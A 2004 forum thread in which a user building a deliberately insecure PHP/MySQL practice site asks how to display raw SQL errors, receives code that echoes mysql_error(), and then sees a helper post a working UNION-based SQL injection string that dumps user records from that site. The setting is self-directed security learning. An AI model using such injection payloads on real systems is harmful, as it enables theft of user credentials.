Results 1 to 6 of 6

Thread: create SQL errors instead of PHP [resolved]

  1. #1

    Thread Starter
    Frenzied Member Acidic's Avatar
    Join Date
    Sep 2003
    Location
    UK
    Posts
    1,090

    create SQL errors instead of PHP [resolved]

    OK. This might sound odd. I'm making a site which deliberately is insecure. I'm doing this to learn how to exploit it. When i cause a mySQL error I get an error displayed which PHP has made for me. is there a way to get the SQL error instead of the PHP error?
    Last edited by Acidic; Jul 17th, 2004 at 04:37 PM.
    Have I helped you? Please Rate my posts.

  2. #2
    VBA Nutter visualAd's Avatar
    Join Date
    Apr 2002
    Location
    Ickenham, UK
    Posts
    4,906
    PHP || MySql || Apache || Get Firefox || OpenOffice.org || Click || Slap ILMV || 1337 c0d || GotoMyPc For FREE! Part 1, Part 2

    | PHP Session --> Database Handler * Custom Error Handler * Installing PHP * HTML Form Handler * PHP 5 OOP * Using XML * Ajax * Xslt | VB6 Winsock - HTTP POST / GET * Winsock - HTTP File Upload

    Latest quote: crptcblade - VB6 executables can't be decompiled, only disassembled. And the disassembled code is even less useful than I am.

    Random VisualAd: Blog - Latest Post: When the Internet becomes Electricity!!


    Spread happiness and joy. Rate good posts.

  3. #3
    VBA Nutter visualAd's Avatar
    Join Date
    Apr 2002
    Location
    Ickenham, UK
    Posts
    4,906
    And to prevent the PHP error from showing put an @ in front of the function which is producing it:
    PHP Code:
    $result =  @mysql_query ($broken_sql);

    if (! 
    $result)
      echo (
    mysql_error ()); 
    PHP || MySql || Apache || Get Firefox || OpenOffice.org || Click || Slap ILMV || 1337 c0d || GotoMyPc For FREE! Part 1, Part 2

    | PHP Session --> Database Handler * Custom Error Handler * Installing PHP * HTML Form Handler * PHP 5 OOP * Using XML * Ajax * Xslt | VB6 Winsock - HTTP POST / GET * Winsock - HTTP File Upload

    Latest quote: crptcblade - VB6 executables can't be decompiled, only disassembled. And the disassembled code is even less useful than I am.

    Random VisualAd: Blog - Latest Post: When the Internet becomes Electricity!!


    Spread happiness and joy. Rate good posts.

  4. #4

    Thread Starter
    Frenzied Member Acidic's Avatar
    Join Date
    Sep 2003
    Location
    UK
    Posts
    1,090
    lovely, thanks. I knew about the @, but not the mysql_error().
    Last edited by Acidic; Jul 18th, 2004 at 06:35 AM.
    Have I helped you? Please Rate my posts.

  5. #5
    VBA Nutter visualAd's Avatar
    Join Date
    Apr 2002
    Location
    Ickenham, UK
    Posts
    4,906
    Finally :

    I entered this into the user search:
    Code:
    ' or 1=1 UNION ALL SELECT 1,password,2 FROM users WHERE '' = '
    and got this:

    Username: admin
    Username: WhiteAcid
    Username: Romeo
    Username: Gandalf
    Username: hax0r
    Username: Amy
    Username: Bob
    Username: qwerty
    Username: SQLInjection
    Username: ILoveFlowers
    Username: Ring
    Username: 1337
    Username: GiRl
    Username: theBuilder
    PHP || MySql || Apache || Get Firefox || OpenOffice.org || Click || Slap ILMV || 1337 c0d || GotoMyPc For FREE! Part 1, Part 2

    | PHP Session --> Database Handler * Custom Error Handler * Installing PHP * HTML Form Handler * PHP 5 OOP * Using XML * Ajax * Xslt | VB6 Winsock - HTTP POST / GET * Winsock - HTTP File Upload

    Latest quote: crptcblade - VB6 executables can't be decompiled, only disassembled. And the disassembled code is even less useful than I am.

    Random VisualAd: Blog - Latest Post: When the Internet becomes Electricity!!


    Spread happiness and joy. Rate good posts.

  6. #6

    Thread Starter
    Frenzied Member Acidic's Avatar
    Join Date
    Sep 2003
    Location
    UK
    Posts
    1,090
    well done. all usernames and passwords.
    Have I helped you? Please Rate my posts.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  



Click Here to Expand Forum to Full Width